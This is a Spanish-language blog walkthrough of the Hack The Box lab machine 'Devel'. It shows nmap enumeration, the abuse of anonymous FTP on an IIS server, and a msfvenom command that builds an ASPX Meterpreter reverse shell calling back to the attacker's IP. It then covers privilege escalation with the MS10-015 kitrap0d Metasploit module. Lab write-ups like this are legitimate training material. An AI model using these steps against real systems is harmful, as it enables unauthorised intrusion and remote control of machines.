Enumeración

Escaneo de puertos con Nmap

nmap -sC -sV 10.10.10.5 -o nmap.txt


Nmap nos devuelve que tiene los servicios FTP y HTTP abiertos. En el FTP se encuentra activada la opción de entrada anónima, el script NSE nos lista los archivos y directorios encontrados en el FTP.
A simple vista llama la atención que estos archivos y directorios son los mismos que en el servicio HTTP:

Explotación

FTP del servidor IIS con acceso anónimo permitido

Vamos a crear un payload en ASPX con msfvenom:

root@kali:~/htb/Devel# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=1234 -f aspx > shell.aspx


Ya tenemos nuestro payload creado y listo para subirlo al FTP:

Una vez subido el payload, vamos a poner a la escucha y acceder a la URL en la cual se ha subido nuestro archivo para que se ejecute el código malicioso:

Listo, hemos obtenido con éxito una shell de Meterpreter.

Escalación de privilegios

Vamos a lanzar el módulo post/multi/recon/local_exploit_suggester de Metasploit para encontrar posibles exploits funcionales:

Escalación mediante MS10-015 con Metasploit

Después de probar varios exploits, damos en el clavo con el siguiente: exploit/windows/local/ms10_015_kitrap0d.

Por último, solo nos queda obtener las dos flags:

meterpreter > cat C:/Users/babis/Desktop/user.txt.txt

meterpreter > cat C:/Users/Administrator/Desktop/root.txt.txt

¿Me ayudas a compartirlo?
Última modificación: 21 abril 2019

Autor

Comentarios

Comenta o responde a los comentarios

Tu dirección de correo no será publicada.

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.